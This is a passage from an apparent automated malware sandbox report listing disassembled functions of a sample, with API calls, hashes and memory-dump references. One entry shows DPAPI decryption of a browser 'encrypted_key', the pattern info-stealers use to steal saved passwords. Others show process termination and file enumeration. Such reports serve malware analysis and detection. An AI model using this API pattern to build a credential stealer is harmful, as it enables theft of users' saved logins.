                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 78cd8d56950b712a3873db40d0f102bece925a4a5f50cf764b806cb9fdbde22f
                              • Instruction ID: 598931ab74a4d1d9d9f3e784dbafb2781c5506f155c9a686771058c481619ea8
                              • Opcode Fuzzy Hash: 78cd8d56950b712a3873db40d0f102bece925a4a5f50cf764b806cb9fdbde22f
                              • Instruction Fuzzy Hash: 7B310DB5D1021DABCB15DBA5DC85BEEB7B8AB48304F144519F905A6281EB309E44CBA1
                              Function 009F94D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 009F94EB
                                • Part of subcall function 009F8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009F951E,00000000), ref: 009F8D5B
                                • Part of subcall function 009F8D50: RtlAllocateHeap.NTDLL(00000000), ref: 009F8D62
                                • Part of subcall function 009F8D50: wsprintfW.USER32 ref: 009F8D78
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 009F95AB
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 009F95C9
                              • CloseHandle.KERNEL32(00000000), ref: 009F95D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 3729781310-0
                              • Opcode ID: 10f6a3e3a0461b212f35b72ba23df92326fb4bab74a12e2fa50a25aafad3ccab
                              • Instruction ID: 6d49e258dea99f3a9ea1ce3930eca63dea78a66720ea33b25a7730ed3d71d032
                              • Opcode Fuzzy Hash: 10f6a3e3a0461b212f35b72ba23df92326fb4bab74a12e2fa50a25aafad3ccab
                              • Instruction Fuzzy Hash: C8311CB1A1020C9FDB15DBE0CD49BEDB778EB44700F104459F606AA584DB74AA89CB51
                              Function 009F92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(009F3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,009F3AEE,?), ref: 009F92FC
                              • GetFileSizeEx.KERNEL32(000000FF,009F3AEE), ref: 009F9319
                              • CloseHandle.KERNEL32(000000FF), ref: 009F9327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: 81a1dc644634bbdb86fc2c764c82e94eeb9796d7088ec1efcab2fb8e3309ed4d
                              • Instruction ID: 1ef5f720406261b24c8781b9607841aeddca41d2042fa4abf3fc14a106ee8219
                              • Opcode Fuzzy Hash: 81a1dc644634bbdb86fc2c764c82e94eeb9796d7088ec1efcab2fb8e3309ed4d
                              • Instruction Fuzzy Hash: 09F04F35E50208BBDF20DFB4DC49FAE77B9AB48710F20C654BA51A72C0DAB496018B44
                              Function 009FC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 009FC74E
                                • Part of subcall function 009FBF9F: __amsg_exit.LIBCMT ref: 009FBFAF
                              • __getptd.LIBCMT ref: 009FC765
                              • __amsg_exit.LIBCMT ref: 009FC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 009FC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 71f69bb8250617e28f1e536743f9e5ecf7f6ad3077d53516cc62477642fa83b9
                              • Instruction ID: b212c75c14880eb25b3bc7c57400c56a7140a18056e2fe73c0972ebf2aacbc9b
                              • Opcode Fuzzy Hash: 71f69bb8250617e28f1e536743f9e5ecf7f6ad3077d53516cc62477642fa83b9
                              • Instruction Fuzzy Hash: 12F090B290430C9BD720BFB89E06B7933A06F80720F248149F718AA1D2DB645941DF56
                              Function 009F4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009F8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 009F4F7A
                              • lstrcat.KERNEL32(?,00A01070), ref: 009F4F97
                              • lstrcat.KERNEL32(?,013B8A60), ref: 009F4FAB
                              • lstrcat.KERNEL32(?,00A01074), ref: 009F4FBD
                                • Part of subcall function 009F4910: wsprintfA.USER32 ref: 009F492C
                                • Part of subcall function 009F4910: FindFirstFileA.KERNEL32(?,?), ref: 009F4943
                                • Part of subcall function 009F4910: StrCmpCA.SHLWAPI(?,00A00FDC), ref: 009F4971
                                • Part of subcall function 009F4910: StrCmpCA.SHLWAPI(?,00A00FE0), ref: 009F4987
                                • Part of subcall function 009F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 009F4B7D
                                • Part of subcall function 009F4910: FindClose.KERNEL32(000000FF), ref: 009F4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 32a84404844ac71522b929bab62e6dc93a17541b8cef960d68c6364669283aea
                              • Instruction ID: 38bc254bbc996d0dc1f8db595b89a4618dd15fb31123265ff7c0c4fe419dd3d4
                              • Opcode Fuzzy Hash: 32a84404844ac71522b929bab62e6dc93a17541b8cef960d68c6364669283aea
                              • Instruction Fuzzy Hash: 1221687691020C67CB64FB70EC46FEE337CAB94700F004554B659965C1EEB49AC98B92